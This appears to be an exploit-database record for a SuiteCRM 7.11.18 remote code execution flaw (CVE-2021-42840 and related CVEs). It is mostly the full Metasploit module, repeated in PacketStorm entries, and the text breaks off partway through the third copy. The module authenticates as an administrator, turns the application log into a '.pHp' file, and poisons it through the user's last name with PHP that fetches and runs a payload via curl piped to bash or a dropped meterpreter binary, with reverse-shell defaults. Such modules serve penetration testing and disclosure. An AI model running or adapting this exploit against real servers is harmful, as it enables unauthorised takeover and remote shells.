SuiteCRM 7.11.18 - Remote Code Execution Exploit

2021-11-17T00:00:00

Description

{"id": "1337DAY-ID-37054", "vendorId": null, "type": "zdt", "bulletinFamily": "exploit", "title": "SuiteCRM 7.11.18 - Remote Code Execution Exploit", "description": "", "published": "2021-11-17T00:00:00", "modified": "2021-11-17T00:00:00", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/37054", "reporter": "metasploit", "references": [], "cvelist": ["CVE-2020-28320", "CVE-2021-42840"], "immutableFields": [], "lastseen": "2021-12-03T01:48:39", "viewCount": 268, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-28320", "CVE-2021-42840"]}, {"type": "exploitdb", "idList": ["EDB-ID:50531"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/HTTP/SUITECRM_LOG_FILE_RCE/"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162975", "PACKETSTORM:165001"]}, {"type": "zdt", "idList": ["1337DAY-ID-36361"]}]}, "score": {"value": 5.4, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2020-28328"]}, {"type": "exploitdb", "idList": ["EDB-ID:50531"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162975", "PACKETSTORM:165001"]}, {"type": "zdt", "idList": ["1337DAY-ID-36361"]}]}, "exploitation": null, "vulnersScore": 5.4}, "sourceHref": "https://0day.today/exploit/37054", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::CmdStager\n include Msf::Exploit::FileDropper\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'SuiteCRM Log File Remote Code Execution',\n 'Description' => %q{\n This module exploits an input validation error on the log file extension parameter. It does\n not properly validate upper/lower case characters. Once this occurs, the application log file\n will be treated as a php file. The log file can then be populated with php code by changing the\n username of a valid user, as this info is logged. The php code in the file can then be executed\n by sending an HTTP request to the log file. A similar issue was reported by the same researcher\n where a blank file extension could be supplied and the extension could be provided in the file\n name. This exploit will work on those versions as well, and those references are included.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'M. Cory Billington' # @_th3y\n ],\n 'References' => [\n ['CVE', '2021-42840'],\n ['CVE', '2020-28328'], # First CVE\n ['EDB', '49001'], # Previous exploit, this module will cover those versions too. Almost identical issue.\n ['URL', 'https://theyhack.me/CVE-2020-28320-SuiteCRM-RCE/'], # First exploit\n ['URL', 'https://theyhack.me/SuiteCRM-RCE-2/'] # This exploit\n ],\n 'Platform' => %w[linux unix],\n 'Arch' => %w[ARCH_X64 ARCH_CMD ARCH_X86],\n 'Targets' => [\n [\n 'Linux (x64)', {\n 'Arch' => ARCH_X64,\n 'Platform' => 'linux',\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'\n }\n }\n ],\n [\n 'Linux (cmd)', {\n 'Arch' => ARCH_CMD,\n 'Platform' => 'unix',\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_bash'\n }\n }\n ]\n ],\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],\n 'Reliability' => [REPEATABLE_SESSION]\n },\n 'Privileged' => true,\n 'DisclosureDate' => '2021-04-28',\n 'DefaultTarget' => 0\n )\n )\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to SuiteCRM', '/']),\n OptString.new('USER', [true, 'Username of user with administrative rights', 'admin']),\n OptString.new('PASS', [true, 'Password for administrator', 'admin']),\n OptBool.new('RESTORECONF', [false, 'Restore the configuration file to default after exploit runs', true]),\n OptString.new('WRITABLEDIR', [false, 'Writable directory to stage meterpreter', '/tmp']),\n OptString.new('LASTNAME', [false, 'Admin user last name to clean up profile', 'admin'])\n ]\n )\n end\n\n def check\n authenticate unless @authenticated\n return Exploit::CheckCode::Unknown unless @authenticated\n\n version_check_request = send_request_cgi(\n {\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'keep_cookies' => true,\n 'vars_get' => {\n 'module' => 'Home',\n 'action' => 'About'\n }\n }\n )\n\n return Exploit::CheckCode::Unknown(\"#{peer} - Connection timed out\") unless version_check_request\n\n version_match = version_check_request.body[/\n Version\n \\s\n \\d{1} # Major revision\n \\.\n \\d{1,2} # Minor revision\n \\.\n \\d{1,2} # Bug fix release\n /x]\n\n version = version_match.partition(' ').last\n\n if version.nil? || version.empty?\n about_url = \"#{full_uri}#{normalize_uri(target_uri, 'index.php')}?module=Home&action=About\"\n return Exploit::CheckCode::Unknown(\"Check #{about_url} to confirm version.\")\n end\n\n patched_version = Rex::Version.new('7.11.18')\n current_version = Rex::Version.new(version)\n\n return Exploit::CheckCode::Appears(\"SuiteCRM #{version}\") if current_version <= patched_version\n\n Exploit::CheckCode::Safe(\"SuiteCRM #{version}\")\n end\n\n def authenticate\n print_status(\"Authenticating as #{datastore['USER']}\")\n initial_req = send_request_cgi(\n {\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri, 'index.php'),\n 'keep_cookies' => true,\n 'vars_get' => {\n 'module' => 'Users',\n 'action' => 'Login'\n }\n }\n )\n\n return false unless initial_req && initial_req.code == 200\n\n login = send_request_cgi(\n {\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri, 'index.php'),\n 'keep_cookies' => true,\n 'vars_post' => {\n 'module' => 'Users',\n 'action' => 'Authenticate',\n 'return_module' => 'Users',\n 'return_action' => 'Login',\n 'user_name' => datastore['USER'],\n 'username_password' => datastore['PASS'],\n 'Login' => 'Log In'\n }\n }\n )\n\n return false unless login && login.code == 302\n\n res = send_request_cgi(\n {\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri, 'index.php'),\n 'keep_cookies' => true,\n 'vars_get' => {\n 'module' => 'Administration',\n 'action' => 'index'\n }\n }\n )\n\n auth_succeeded?(res)\n end\n\n def auth_succeeded?(res)\n return false unless res\n\n if res.code == 200\n print_good(\"Authenticated as: #{datastore['USER']}\")\n if res.body.include?('Unauthorized access to administration.')\n print_warning(\"#{datastore['USER']} does not have administrative rights! Exploit will fail.\")\n @is_admin = false\n else\n print_good(\"#{datastore['USER']} has administrative rights.\")\n @is_admin = true\n end\n @authenticated = true\n return true\n else\n print_error(\"Failed to authenticate as: #{datastore['USER']}\")\n return false\n end\n end\n\n def post_log_file(data)\n send_request_cgi(\n {\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri, 'index.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'keep_cookies' => true,\n 'headers' => {\n 'Referer' => \"#{full_uri}#{normalize_uri(target_uri, 'index.php')}?module=Configurator&action=EditView\"\n },\n 'data' => data.to_s\n }\n )\n end\n\n def modify_system_settings_file\n filename = rand_text_alphanumeric(8).to_s\n extension = '.pHp'\n @php_fname = filename + extension\n action = 'Modify system settings file'\n print_status(\"Trying - #{action}\")\n\n data = Rex::MIME::Message.new\n data.add_part('SaveConfig', nil, nil, 'form-data; name=\"action\"')\n data.add_part('Configurator', nil, nil, 'form-data; name=\"module\"')\n data.add_part(filename.to_s, nil, nil, 'form-data; name=\"logger_file_name\"')\n data.add_part(extension.to_s, nil, nil, 'form-data; name=\"logger_file_ext\"')\n data.add_part('info', nil, nil, 'form-data; name=\"logger_level\"')\n data.add_part('Save', nil, nil, 'form-data; name=\"save\"')\n\n res = post_log_file(data)\n check_logfile_request(res, action)\n end\n\n def poison_log_file\n action = 'Poison log file'\n if target.arch.first == 'cmd'\n command_injection = \"<?php `curl #{@download_url} | bash`; ?>\"\n else\n @meterpreter_fname = \"#{datastore['WRITABLEDIR']}/#{rand_text_alphanumeric(8)}\"\n command_injection = %(\n <?php `curl #{@download_url} -o #{@meterpreter_fname};\n /bin/chmod 700 #{@meterpreter_fname};\n /bin/sh -c #{@meterpreter_fname};`; ?>\n )\n end\n\n print_status(\"Trying - #{action}\")\n\n data = Rex::MIME::Message.new\n data.add_part('Users', nil, nil, 'form-data; name=\"module\"')\n data.add_part('1', nil, nil, 'form-data; name=\"record\"')\n data.add_part('Save', nil, nil, 'form-data; name=\"action\"')\n data.add_part('EditView', nil, nil, 'form-data; name=\"page\"')\n data.add_part('DetailView', nil, nil, 'form-data; name=\"return_action\"')\n data.add_part(datastore['USER'], nil, nil, 'form-data; name=\"user_name\"')\n data.add_part(command_injection, nil, nil, 'form-data; name=\"last_name\"')\n\n res = post_log_file(data)\n check_logfile_request(res, action)\n end\n\n def restore\n action = 'Restore logging to default configuration'\n print_status(\"Trying - #{action}\")\n\n data = Rex::MIME::Message.new\n data.add_part('SaveConfig', nil, nil, 'form-data; name=\"action\"')\n data.add_part('Configurator', nil, nil, 'form-data; name=\"module\"')\n data.add_part('suitecrm', nil, nil, 'form-data; name=\"logger_file_name\"')\n data.add_part('.log', nil, nil, 'form-data; name=\"logger_file_ext\"')\n data.add_part('fatal', nil, nil, 'form-data; name=\"logger_level\"')\n data.add_part('Save', nil, nil, 'form-data; name=\"save\"')\n\n post_log_file(data)\n\n data = Rex::MIME::Message.new\n data.add_part('Users', nil, nil, 'form-data; name=\"module\"')\n data.add_part('1', nil, nil, 'form-data; name=\"record\"')\n data.add_part('Save', nil, nil, 'form-data; name=\"action\"')\n data.add_part('EditView', nil, nil, 'form-data; name=\"page\"')\n data.add_part('DetailView', nil, nil, 'form-data; name=\"return_action\"')\n data.add_part(datastore['USER'], nil, nil, 'form-data; name=\"user_name\"')\n data.add_part(datastore['LASTNAME'], nil, nil, 'form-data; name=\"last_name\"')\n\n res = post_log_file(data)\n\n print_error(\"Failed - #{action}\") unless res && res.code == 301\n\n print_good(\"Succeeded - #{action}\")\n end\n\n def check_logfile_request(res, action)\n fail_with(Failure::Unknown, \"#{action} - no reply\") unless res\n\n unless res.code == 301\n print_error(\"Failed - #{action}\")\n fail_with(Failure::UnexpectedReply, \"Failed - #{action}\")\n end\n\n print_good(\"Succeeded - #{action}\")\n end\n\n def execute_php\n print_status(\"Executing php code in log file: #{@php_fname}\")\n res = send_request_cgi(\n {\n 'uri' => normalize_uri(target_uri, @php_fname),\n 'keep_cookies' => true\n }\n )\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{@php_fname}\") if res && res.code == 404\n register_files_for_cleanup(@php_fname)\n register_files_for_cleanup(@meterpreter_fname) unless @meterpreter_fname.nil? || @meterpreter_fname.empty?\n end\n\n def on_request_uri(cli, _request)\n send_response(cli, payload.encoded, { 'Content-Type' => 'text/plain' })\n print_good(\"#{peer} - Payload sent!\")\n end\n\n def start_http_server\n start_service(\n {\n 'Uri' => {\n 'Proc' => proc do |cli, req|\n on_request_uri(cli, req)\n end,\n 'Path' => resource_uri\n }\n }\n )\n @download_url = get_uri\n end\n\n def exploit\n start_http_server\n authenticate unless @authenticated\n fail_with(Failure::NoAccess, datastore['USER'].to_s) unless @authenticated\n fail_with(Failure::NoAccess, \"#{datastore['USER']} does not have administrative rights!\") unless @is_admin\n modify_system_settings_file\n poison_log_file\n execute_php\n ensure\n restore if datastore['RESTORECONF']\n end\nend\n", "category": "web applications", "verified": true, "_state": {"dependencies": 1647589307, "score": 0}}

{"packetstorm": [{"lastseen": "2021-11-17T17:16:34", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-17T00:00:00", "type": "packetstorm", "title": "SuiteCRM 7.11.18 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28320", "CVE-2020-28328", "CVE-2021-42840"], "modified": "2021-11-17T00:00:00", "id": "PACKETSTORM:165001", "href": "https://packetstormsecurity.com/files/165001/SuiteCRM-7.11.18-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = GoodRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::CmdStager \ninclude Msf::Exploit::FileDropper \nprepend Msf::Exploit::Remote::AutoCheck \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'SuiteCRM Log File Remote Code Execution', \n'Description' => %q{ \nThis module exploits an input validation error on the log file extension parameter. It does \nnot properly validate upper/lower case characters. Once this occurs, the application log file \nwill be treated as a php file. The log file can then be populated with php code by changing the \nusername of a valid user, as this info is logged. The php code in the file can then be executed \nby sending an HTTP request to the log file. A similar issue was reported by the same researcher \nwhere a blank file extension could be supplied and the extension could be provided in the file \nname. This exploit will work on those versions as well, and those references are included. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'M. Cory Billington' # @_th3y \n], \n'References' => [ \n['CVE', '2021-42840'], \n['CVE', '2020-28328'], # First CVE \n['EDB', '49001'], # Previous exploit, this module will cover those versions too. Almost identical issue. \n['URL', 'https://theyhack.me/CVE-2020-28320-SuiteCRM-RCE/'], # First exploit \n['URL', 'https://theyhack.me/SuiteCRM-RCE-2/'] # This exploit \n], \n'Platform' => %w[linux unix], \n'Arch' => %w[ARCH_X64 ARCH_CMD ARCH_X86], \n'Targets' => [ \n[ \n'Linux (x64)', { \n'Arch' => ARCH_X64, \n'Platform' => 'linux', \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp' \n} \n} \n], \n[ \n'Linux (cmd)', { \n'Arch' => ARCH_CMD, \n'Platform' => 'unix', \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_bash' \n} \n} \n] \n], \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS], \n'Reliability' => [REPEATABLE_SESSION] \n}, \n'Privileged' => true, \n'DisclosureDate' => '2021-04-28', \n'DefaultTarget' => 0 \n) \n) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [true, 'The base path to SuiteCRM', '/']), \nOptString.new('USER', [true, 'Username of user with administrative rights', 'admin']), \nOptString.new('PASS', [true, 'Password for administrator', 'admin']), \nOptBool.new('RESTORECONF', [false, 'Restore the configuration file to default after exploit runs', true]), \nOptString.new('WRITABLEDIR', [false, 'Writable directory to stage meterpreter', '/tmp']), \nOptString.new('LASTNAME', [false, 'Admin user last name to clean up profile', 'admin']) \n] \n) \nend \n \ndef check \nauthenticate unless @authenticated \nreturn Exploit::CheckCode::Unknown unless @authenticated \n \nversion_check_request = send_request_cgi( \n{ \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'index.php'), \n'keep_cookies' => true, \n'vars_get' => { \n'module' => 'Home', \n'action' => 'About' \n} \n} \n) \n \nreturn Exploit::CheckCode::Unknown(\"#{peer} - Connection timed out\") unless version_check_request \n \nversion_match = version_check_request.body[/ \nVersion \n\\s \n\\d{1} # Major revision \n\\. \n\\d{1,2} # Minor revision \n\\. \n\\d{1,2} # Bug fix release \n/x] \n \nversion = version_match.partition(' ').last \n \nif version.nil? || version.empty? \nabout_url = \"#{full_uri}#{normalize_uri(target_uri, 'index.php')}?module=Home&action=About\" \nreturn Exploit::CheckCode::Unknown(\"Check #{about_url} to confirm version.\") \nend \n \npatched_version = Rex::Version.new('7.11.18') \ncurrent_version = Rex::Version.new(version) \n \nreturn Exploit::CheckCode::Appears(\"SuiteCRM #{version}\") if current_version <= patched_version \n \nExploit::CheckCode::Safe(\"SuiteCRM #{version}\") \nend \n \ndef authenticate \nprint_status(\"Authenticating as #{datastore['USER']}\") \ninitial_req = send_request_cgi( \n{ \n'method' => 'GET', \n'uri' => normalize_uri(target_uri, 'index.php'), \n'keep_cookies' => true, \n'vars_get' => { \n'module' => 'Users', \n'action' => 'Login' \n} \n} \n) \n \nreturn false unless initial_req && initial_req.code == 200 \n \nlogin = send_request_cgi( \n{ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri, 'index.php'), \n'keep_cookies' => true, \n'vars_post' => { \n'module' => 'Users', \n'action' => 'Authenticate', \n'return_module' => 'Users', \n'return_action' => 'Login', \n'user_name' => datastore['USER'], \n'username_password' => datastore['PASS'], \n'Login' => 'Log In' \n} \n} \n) \n \nreturn false unless login && login.code == 302 \n \nres = send_request_cgi( \n{ \n'method' => 'GET', \n'uri' => normalize_uri(target_uri, 'index.php'), \n'keep_cookies' => true, \n'vars_get' => { \n'module' => 'Administration', \n'action' => 'index' \n} \n} \n) \n \nauth_succeeded?(res) \nend \n \ndef auth_succeeded?(res) \nreturn false unless res \n \nif res.code == 200 \nprint_good(\"Authenticated as: #{datastore['USER']}\") \nif res.body.include?('Unauthorized access to administration.') \nprint_warning(\"#{datastore['USER']} does not have administrative rights! Exploit will fail.\") \n@is_admin = false \nelse \nprint_good(\"#{datastore['USER']} has administrative rights.\") \n@is_admin = true \nend \n@authenticated = true \nreturn true \nelse \nprint_error(\"Failed to authenticate as: #{datastore['USER']}\") \nreturn false \nend \nend \n \ndef post_log_file(data) \nsend_request_cgi( \n{ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri, 'index.php'), \n'ctype' => \"multipart/form-data; boundary=#{data.bound}\", \n'keep_cookies' => true, \n'headers' => { \n'Referer' => \"#{full_uri}#{normalize_uri(target_uri, 'index.php')}?module=Configurator&action=EditView\" \n}, \n'data' => data.to_s \n} \n) \nend \n \ndef modify_system_settings_file \nfilename = rand_text_alphanumeric(8).to_s \nextension = '.pHp' \n@php_fname = filename + extension \naction = 'Modify system settings file' \nprint_status(\"Trying - #{action}\") \n \ndata = Rex::MIME::Message.new \ndata.add_part('SaveConfig', nil, nil, 'form-data; name=\"action\"') \ndata.add_part('Configurator', nil, nil, 'form-data; name=\"module\"') \ndata.add_part(filename.to_s, nil, nil, 'form-data; name=\"logger_file_name\"') \ndata.add_part(extension.to_s, nil, nil, 'form-data; name=\"logger_file_ext\"') \ndata.add_part('info', nil, nil, 'form-data; name=\"logger_level\"') \ndata.add_part('Save', nil, nil, 'form-data; name=\"save\"') \n \nres = post_log_file(data) \ncheck_logfile_request(res, action) \nend \n \ndef poison_log_file \naction = 'Poison log file' \nif target.arch.first == 'cmd' \ncommand_injection = \"<?php `curl #{@download_url} | bash`; ?>\" \nelse \n@meterpreter_fname = \"#{datastore['WRITABLEDIR']}/#{rand_text_alphanumeric(8)}\" \ncommand_injection = %( \n<?php `curl #{@download_url} -o #{@meterpreter_fname}; \n/bin/chmod 700 #{@meterpreter_fname}; \n/bin/sh -c #{@meterpreter_fname};`; ?> \n) \nend \n \nprint_status(\"Trying - #{action}\") \n \ndata = Rex::MIME::Message.new \ndata.add_part('Users', nil, nil, 'form-data; name=\"module\"') \ndata.add_part('1', nil, nil, 'form-data; name=\"record\"') \ndata.add_part('Save', nil, nil, 'form-data; name=\"action\"') \ndata.add_part('EditView', nil, nil, 'form-data; name=\"page\"') \ndata.add_part('DetailView', nil, nil, 'form-data; name=\"return_action\"') \ndata.add_part(datastore['USER'], nil, nil, 'form-data; name=\"user_name\"') \ndata.add_part(command_injection, nil, nil, 'form-data; name=\"last_name\"') \n \nres = post_log_file(data) \ncheck_logfile_request(res, action) \nend \n \ndef restore \naction = 'Restore logging to default configuration' \nprint_status(\"Trying - #{action}\") \n \ndata = Rex::MIME::Message.new \ndata.add_part('SaveConfig', nil, nil, 'form-data; name=\"action\"') \ndata.add_part('Configurator', nil, nil, 'form-data; name=\"module\"') \ndata.add_part('suitecrm', nil, nil, 'form-data; name=\"logger_file_name\"') \ndata.add_part('.log', nil, nil, 'form-data; name=\"logger_file_ext\"') \ndata.add_part('fatal', nil, nil, 'form-data; name=\"logger_level\"') \ndata.add_part('Save', nil, nil, 'form-data; name=\"save\"') \n \npost_log_file(data) \n \ndata = Rex::MIME::Message.new \ndata.add_part('Users', nil, nil, 'form-data; name=\"module\"') \ndata.add_part('1', nil, nil, 'form-data; name=\"record\"') \ndata.add_part('Save', nil, nil, 'form-data; name=\"action\"') \ndata.add_part('EditView', nil, nil, 'form-data; name=\"page\"') \ndata.add_part('DetailView', nil, nil, 'form-data; name=\"return_action\"') \ndata.add_part(datastore['USER'], nil, nil, 'form-data; name=\"user_name\"') \ndata.add_part(datastore['LASTNAME'], nil, nil, 'form-data; name=\"last_name\"') \n \nres = post_log_file(data) \n \nprint_error(\"Failed - #{action}\") unless res && res.code == 301 \n \nprint_good(\"Succeeded - #{action}\") \nend \n \ndef check_logfile_request(res, action) \nfail_with(Failure::Unknown, \"#{action} - no reply\") unless res \n \nunless res.code == 301 \nprint_error(\"Failed - #{action}\") \nfail_with(Failure::UnexpectedReply, \"Failed - #{action}\") \nend \n \nprint_good(\"Succeeded - #{action}\") \nend \n \ndef execute_php \nprint_status(\"Executing php code in log file: #{@php_fname}\") \nres = send_request_cgi( \n{ \n'uri' => normalize_uri(target_uri, @php_fname), \n'keep_cookies' => true \n} \n) \nfail_with(Failure::NotFound, \"#{peer} - Not found: #{@php_fname}\") if res && res.code == 404 \nregister_files_for_cleanup(@php_fname) \nregister_files_for_cleanup(@meterpreter_fname) unless @meterpreter_fname.nil? || @meterpreter_fname.empty? \nend \n \ndef on_request_uri(cli, _request) \nsend_response(cli, payload.encoded, { 'Content-Type' => 'text/plain' }) \nprint_good(\"#{peer} - Payload sent!\") \nend \n \ndef start_http_server \nstart_service( \n{ \n'Uri' => { \n'Proc' => proc do |cli, req| \non_request_uri(cli, req) \nend, \n'Path' => resource_uri \n} \n} \n) \n@download_url = get_uri \nend \n \ndef exploit \nstart_http_server \nauthenticate unless @authenticated \nfail_with(Failure::NoAccess, datastore['USER'].to_s) unless @authenticated \nfail_with(Failure::NoAccess, \"#{datastore['USER']} does not have administrative rights!\") unless @is_admin \nmodify_system_settings_file \npoison_log_file \nexecute_php \nensure \nrestore if datastore['RESTORECONF'] \nend \nend \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/165001/suitecrm71118-exec.rb.txt", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-06-04T16:20:13", "description": "", "cvss3": {}, "published": "2021-06-04T00:00:00", "type": "packetstorm", "title": "SuiteCRM Log File Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-28320", "CVE-2020-28328"], "modified": "2021-06-04T00:00:00", "id": "PACKETSTORM:162975", "href": "https://packetstormsecurity.com/files/162975/SuiteCRM-Log-File-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = GoodRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::CmdStager \ninclude Msf::Exploit::FileDropper \nprepend Msf::Exploit::Remote::AutoCheck \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'SuiteCRM Log File Remote Code Execution', \n'Description' => %q{ \nThis module exploits an input validation error on the log file extension parameter. It does \nnot properly validate upper/lower case characters. Once this occurs, the application log file \nwill be treated as a php file. The log file can then be populated with php code by changing the \nusername of a valid user, as this info is logged. The php code in the file can then be executed \nby sending an HTTP request to the log file. A similar issue was reported by the same researcher \nwhere a blank file extension could be supplied and the extension could be provided in the file \nname. This exploit will work on those versions as well, and those references are included. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'M. Cory Billington' # @_th3y \n], \n'References' => \n[ \n['CVE', '2020-28328'], # First CVE \n['EDB', '49001'], # Previous exploit, this module will cover those versions too. Almost identical issue. \n['URL', 'https://theyhack.me/CVE-2020-28320-SuiteCRM-RCE/'], # First exploit \n['URL', 'https://theyhack.me/SuiteCRM-RCE-2/'] # This exploit \n], \n'Platform' => %w[linux unix], \n'Arch' => %w[ARCH_X64 ARCH_CMD ARCH_X86], \n'Targets' => \n[ \n[ \n'Linux (x64)', { \n'Arch' => ARCH_X64, \n'Platform' => 'linux', \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp' \n} \n} \n], \n[ \n'Linux (cmd)', { \n'Arch' => ARCH_CMD, \n'Platform' => 'unix', \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_bash' \n} \n} \n] \n], \n'Notes' => \n{ \n'Stability' => [CRASH_SAFE], \n'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS], \n'Reliability' => [REPEATABLE_SESSION] \n}, \n'Privileged' => true, \n'DisclosureDate' => '2021-04-28', \n'DefaultTarget' => 0 \n) \n) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [true, 'The base path to SuiteCRM', '/']), \nOptString.new('USER', [true, 'Username of user with administrative rights', 'admin']), \nOptString.new('PASS', [true, 'Password for administrator', 'admin']), \nOptBool.new('RESTORECONF', [false, 'Restore the configuration file to default after exploit runs', true]), \nOptString.new('WRITABLEDIR', [false, 'Writable directory to stage meterpreter', '/tmp']), \nOptString.new('LASTNAME', [false, 'Admin user last name to clean up profile', 'admin']) \n] \n) \nend \n \ndef check \nauthenticate unless @authenticated \nreturn Exploit::CheckCode::Unknown unless @authenticated \n \nversion_check_request = send_request_cgi( \n{ \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'index.php'), \n'keep_cookies' => true, \n'vars_get' => { \n'module' => 'Home', \n'action' => 'About' \n} \n} \n) \n \nreturn Exploit::CheckCode::Unknown(\"#{peer} - Connection timed out\") unless version_check_request \n \nversion_match = version_check_request.body[/ \nVersion \n\\s \n\\d{1} # Major revision \n\\. \n\\d{1,2} # Minor revision \n\\. \n\\d{1,2} # Bug fix release \n/x] \n \nversion = version_match.partition(' ').last \n \nif version.nil? || version.empty? \nabout_url = \"#{full_uri}#{normalize_uri(target_uri, 'index.php')}?module=Home&action=About\" \nreturn Exploit::CheckCode::Unknown(\"Check #{about_url} to confirm version.\") \nend \n \npatched_version = Rex::Version.new('7.11.18') \ncurrent_version = Rex::Version.new(version) \n \nreturn Exploit::CheckCode::Appears(\"SuiteCRM #{version}\") if current_version <= patched_version \n \nExploit::CheckCode::Safe(\"SuiteCRM #{version}\") \nend \n \ndef authenticate \nprint_status(\"Authenticating as #{datastore['USER']}\") \ninitial_req = send_request_cgi( \n{ \n'method' => 'GET', \n'uri' => normalize_uri(target_uri, 'index.php'), \n'keep_cookies' => true, \n'vars_get' => { \n'module' => 'Users', \n'action' => 'Login' \n} \n} \n) \n \nreturn false unless initial_req && initial_req.code == 200 \n \nlogin = send_request_cgi( \n{ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri, 'index.php'), \n'keep_cookies' => true, \n'vars_post' => { \n'module' => 'Users', \n'action' => 'Authenticate', \n'return_module' => 'Users', \n'return_action' => 'Login', \n'user_name' => datastore['USER'], \n'username_password' => datastore['PASS'], \n'Login' => 'Log In' \n} \n} \n) \n \nreturn false unless login && login.code == 302 \n \nres = send_request_cgi( \n{ \n'method' => 'GET', \n'uri' => normalize_uri(target_uri, 'index.php'), \n'keep_cookies' => true, \n'vars_get' => { \n'module' => 'Administration', \n'action' => 'index' \n} \n} \n) \n \nauth_succeeded?(res) \nend \n \ndef auth_succeeded?(res) \nreturn false unless res \n \nif res.code == 200 \nprint_good(\"Authenticated as: #{datastore['USER']}\") \nif res.body.include?('Unauthorized access to administration.') \nprint_warning(\"#{datastore['USER']} does not have administrative rights! Exploit will fail.\") \n@is_admin = false \nelse \nprint_good(\"#{datastore['USER']} has administrative rights.\") \n@is_admin = true \nend \n@authenticated = true \nreturn true \nelse \nprint_error(\"Failed to authenticate as: #{datastore['USER']}\") \nreturn false 